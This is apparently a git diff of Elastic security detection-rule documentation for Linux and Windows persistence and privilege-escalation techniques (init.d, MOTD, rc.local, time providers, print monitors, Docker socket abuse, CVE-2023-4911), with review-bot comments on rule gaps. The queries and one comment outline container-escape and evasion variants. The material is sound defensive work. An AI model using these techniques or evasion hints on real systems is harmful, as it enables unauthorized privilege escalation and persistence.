+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the maliciously created service/init.d files or restore it to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type :"linux" and event.action:("creation" or "file_create_event" or "rename" or "file_rename_event") and +file.path : /etc/init.d/* and not process.name : ("dpkg" or "dockerd" or "rpm" or "dnf" or "chef-client" or "apk" or "yum" or +"rpm" or "vmis-launcher" or "exe") and not file.extension : ("swp" or "swx") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc new file mode 100644 index 0000000000..02aa1a29bf --- /dev/null 
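Review bot: `"rpm"` appears twice in the `not process.name : (...)` exclusion of the rule query; drop the duplicate. While there, `"exe"` as an excluded process name is generic enough to deserve a comment naming the installer it is meant to cover. In the investigation guide, 'Delete the maliciously created service/init.d files or restore it to the original configuration' should read 'restore them'.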
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc 
@@ -0,0 +1,133 @@ +[[prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected]] +=== Potential Persistence Through MOTD File Creation Detected + +Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Persistence Through MOTD File Creation Detected + +The message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux. 
+ +Attackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges. + +This rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Investigate the file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered. 
+ - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. 
+ - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### Related Rules + +- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447 + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the MOTD files or restore their original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type :"linux" and event.action:("creation" or "file_create_event" or "rename" or "file_rename_event") and +file.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : ( + dpkg or dockerd or rpm or executor or dnf +) and not file.extension : ("swp" or "swpx") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc new file mode 100644 index 0000000000..113dc9f2cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc 
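Review bot: the editor swap-file exclusion `not file.extension : ("swp" or "swpx")` in the rule query differs from the sibling init.d rule added in this same package, which excludes `("swp" or "swx")`; the three new persistence rules (init.d, MOTD, rc.local) should agree on one list, and if `swpx` is intentional rather than a typo for Vim's `.swx` temporary file, a comment saying what produces it would help. Also, the False positive analysis section states the activity is unlikely to happen legitimately, yet the query excludes `dpkg`, `dockerd`, `rpm`, `executor` and `dnf`, which shows package installs do write to these directories; the guide text should mention installer activity as the expected benign source.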
@@ -0,0 +1,141 @@ +[[prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected]] +=== Potential Persistence Through Run Control Detected + +This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/ +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts +* https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Persistence Through Run Control Detected + +The `rc.local` file executes custom commands or scripts during system startup on Linux systems. 
`rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. + +There might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. + +Detection alerts from this rule indicate the creation of a new `/etc/rc.local` file. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`. 
+ - !{osquery{"label":"Osquery - Retrieve rc-local.service File Information","query":"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')"}} + - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file. + - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep "rc-local.service|/etc/rc.local Compatibility"` can be executed to check for the execution of the service. + - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. 
+ - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False Positive Analysis + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + +### Response and remediation +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the `service/rc.local` files or restore their original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.category : "file" and +event.type : ("change" or "file_modify_event" or "creation" or "file_create_event") and +file.path : "/etc/rc.local" and not process.name : ( + "dockerd" or "docker" or "dnf" or "dnf-automatic" or "yum" or "rpm" or "dpkg" +) and not file.extension : ("swp" or "swpx") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ +* Sub-technique: +** Name: RC Scripts +** ID: T1037.004 +** Reference URL: https://attack.mitre.org/techniques/T1037/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc new file mode 100644 index 0000000000..8b200f2c67 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc 
@@ -0,0 +1,85 @@ +[[prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification]] +=== Potential Persistence via Time Provider Modification + +Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pentestlab.blog/2019/10/22/persistence-time-providers/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type:"change" and + registry.path: ( + "HKLM\\SYSTEM\\*ControlSet*\\Services\\W32Time\\TimeProviders\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\W32Time\\TimeProviders\\*" + ) and + registry.data.strings:"*.dll" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: 
+** Name: Time Providers +** ID: T1547.003 +** Reference URL: https://attack.mitre.org/techniques/T1547/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Time Providers +** ID: T1547.003 +** Reference URL: https://attack.mitre.org/techniques/T1547/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc new file mode 100644 index 0000000000..3b9e4c28cc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc 
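Review bot: the rule query has no exclusion for the stock providers even though the description itself says the W32Time service loads `w32time.dll`; with `registry.data.strings:"*.dll"` matching any DLL name, a Windows update or a `w32tm` reconfiguration that rewrites the `DllName` value of the built-in `NtpClient`/`NtpServer` providers will alert. Consider excluding `*\\w32time.dll` (and documenting other expected providers, such as the Hyper-V `vmictimeprovider.dll`) and add a False positives note. Also check whether `event.type:"change"` alone covers the first write of a newly registered provider; the port monitor rule in this same package uses `event.type in ("creation", "change")` for the equivalent registry case.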
@@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse]] +=== Potential Port Monitor or Print Processor Registration Abuse + +Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Monitors\\*", + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Print\\Monitors\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\*" + ) and registry.data.strings : "*.dll" and + /* exclude SYSTEM SID - look for changes by non-SYSTEM user */ + not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: 
https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Port Monitors +** ID: T1547.010 +** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Port Monitors +** ID: T1547.010 +** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc new file mode 100644 index 0000000000..d34a367e2f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc 
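Review bot: the `not user.id : "S-1-5-18"` exclusion in the Port Monitor / Print Processor rule query above removes every modification made in the SYSTEM context, so the persistence case that the description ("privilege escalation and/or persistence") and the Persistence tactic in the Framework section promise, an attacker already running as SYSTEM registering a DLL to survive reboot, is out of scope as written. Either say so in the description, or replace the SID exclusion with a narrower one on the process that legitimately writes these keys (the Print Spooler, `spoolsv.exe`) so SYSTEM-context abuse from other processes still alerts. The Tags list only `Tactic: Privilege Escalation` while the Framework section also maps Persistence; add `Tactic: Persistence` or drop the second mapping so the two agree.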
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket]] +=== Potential Privilege Escalation through Writable Docker Socket + +This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#automatic-enumeration-and-escape + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Domain: Container +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +( + (process.name == "docker" and process.args : "run" and process.args : "-it" and + process.args : ("unix://*/docker.sock", "unix://*/dockershim.sock")) or + (process.name == "socat" and process.args : ("UNIX-CONNECT:*/docker.sock", "UNIX-CONNECT:*/dockershim.sock")) +) and not user.Ext.real.id : "0" and not group.Ext.real.id : "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** 
Name: Escape to Host +** ID: T1611 +** Reference URL: https://attack.mitre.org/techniques/T1611/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc new file mode 100644 index 0000000000..586548d527 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc 
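Review bot: `process.args : "-it"` in the Docker socket rule query above only matches the combined short flag, so `docker -H unix:///var/run/docker.sock run -i -t ...`, `--interactive --tty`, and the non-interactive escapes that need no TTY at all (`docker -H unix://... run -v /:/host ... ` followed by a chroot or file write) are missed; the socket argument plus `run` is already a strong enough signal that `-it` can be dropped, with the existing real-uid/gid exclusions handling noise. Note also that a socket selected through the `DOCKER_HOST` environment variable never appears in `process.args`, which is worth a sentence in the description. Typo in the description: "are only be writable" should read "are only writable".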
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration]] +=== Potential Privilege Escalation via Container Misconfiguration + +This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Domain: Container +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name == "runc" and process.args == "run") or + (process.name == "ctr" and process.args == "run" and process.args in ("--privileged", "--mount")) +) and not user.Ext.real.id == "0" and not group.Ext.real.id == "0" and +process.interactive == true and 
process.parent.interactive == true + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Escape to Host +** ID: T1611 +** Reference URL: https://attack.mitre.org/techniques/T1611/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc new file mode 100644 index 0000000000..9daff4a7a1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc 
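Review bot: the `runc` branch of the query above (`process.name == "runc" and process.args == "run"`) alerts on any non-root, interactive `runc run`, which is exactly what rootless container setups do legitimately, so the description's claim that runc and ctr are "leveraged to interact with containers via root permissions" does not hold there and the rule needs a false-positive note. Consider requiring a suspicious argument on the runc branch the way the ctr branch requires `--privileged` or `--mount`, for example a bundle path argument, so plain rootless use stays quiet. The description also has "the access to these utilities are misconfigured" (should be "is misconfigured") and "gain further access onto the host file system" (should be "to").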
@@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911]] +=== Potential Privilege Escalation via CVE-2023-4911 + +This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id, process.executable with maxspan=5s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.env_vars : "*GLIBC_TUNABLES=glibc.*=glibc.*=*"] with runs=5 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ 
